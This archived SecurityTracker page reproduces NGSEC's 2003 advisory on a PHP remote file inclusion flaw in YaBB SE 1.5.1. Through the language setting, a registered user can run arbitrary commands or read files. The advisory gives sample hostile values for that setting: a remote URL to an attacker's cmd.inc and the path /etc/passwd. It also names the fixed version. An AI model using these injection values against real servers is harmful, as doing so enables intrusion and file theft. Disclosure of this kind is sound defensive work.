SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   YaBB SE Vendors:   YaBBSE.org
YaBB SE Include File Error in Language Setting Lets Remote Authenticated Users Execute Arbitrary Operating System Commands
SecurityTracker Alert ID:  1006619
SecurityTracker URL:  http://securitytracker.com/id/1006619
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 22 2003
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.5.1 and prior versions
Description:   Next Generation Security Technologies (NGSEC) reported a vulnerability in YaBB SE. A remote authenticated user can execute arbitrary commands on the system.

The NGSEC advisory indicates that an include file error allows a remote authenticated user to inject PHP code, including operating system commands, to be executed on the target server. The code will run with the privileges of the target web server process.

A remote authenticated user can reportedly change their language setting through the "Change Profile" tab to an invalid value. Subsequent queries from that user will then include the specified (invalid) language setting. The user can set the language variable to point to a user-controlled file on a remote system, where the file contains the user's desired PHP code (including operating system commands).

It is also reported that, when safe_mode is disabled, a remote authenticated user can set the language variable to a local file (e.g., /etc/passwd) to be able to read local files with the privileges of the web server.

Impact:   A remote authenticated user can execute arbitrary PHP code, including operating system commands, on the target server with the privileges of the web server.
Solution:   The vendor has released a fixed version (1.5.2), available at:

http://www.yabbse.org/download.php

Vendor URL:  www.yabbse.org/community/index.php?board=9;action=display;threadid=21830 (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [NGSEC-2003-5] YABB SE, remote command execution



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



                    Next Generation Security Technologies
                           http://www.ngsec.com
                             Security Advisory


        Title:   YABB SE, remote command execution.
           ID:   NGSEC-2003-5
  Application:   YABB SE up to 1.5.1
         Date:   04/22/2003
       Status:   Vendor contacted, new fixed version available.
  Platform(s):   Unix & Windows OSs.
     Location:   http://www.ngsec.com/docs/advisories/NGSEC-2003-5.txt


Overview:
- ---------

YABB SE is a popular bulletin board. It consist on the port of YABB to
MySQL/PHP. Searching at Google "YABB SE" we found about 89,400 results,
confirming its popularity.

YABB SE suffers a PHP injection vulnerability (remote command execution)
in its language support. Any registered user can execute commands with Web
Server privileges (normally nobody).


Technical description:
- ----------------------

Any registered user can inject PHP code in YABB SE through its language
support. YABB SE does an include($language) where $language is the
selected language setting retrieved form the MySQL DataBase.

In order to exploit this vulnerability, you must have a registered user,
change your language setting through the "Change Profile" tab, using one
Pen-Test Web Proxy such as HttPush, to an evil value.

This action will update your language setting in the DataBase. Next
queries will include your evil language setting.

In order to inject PHP code, a malicious user could set the language
variable to for example "http://zhodiac.net-dreamer.net/cmd.inc"
where cmd.inc is the PHP code to inject.

It is also possible to use this vulnerability to access any file on the
server with Web Server privileges, only when safe_mode is disabled,
setting the language variable for example to /etc/passwd.


Recommendations:
- ----------------
Upgrade to a newer YABB SE version (at least 1.5.2).
Run YABB SE on a secure environment.

This vulnerability could not have been exploited on a NGSecureWeb(r)
protected Web Server.

Find more information on NGSecureWeb features at:

       http://www.ngsec.com/ngproducts/ngsw/


- --
More security advisories at: http://www.ngsec.com/ngresearch/ngadvisories/
PGP Key: http://www.ngsec.com/pgp/labs.asc

Copyright(c) 2002-2003 NGSEC. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+pRUEKrwoKcQl8Y4RAtIwAJ9s13PqO7+s3Sf5vQtUwWkNFRxlqwCfeO1H
UFD/u3RLCNYmUPsQKfELgt0=
=pnG4
-----END PGP SIGNATURE-----


Already mastered our Security ngGames at:

   http://quiz.ngsec.biz:8080/

Now, its time to become a NGSEC Security Expert:

   http://www.ngsec.com/ngservices/ngcert/


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC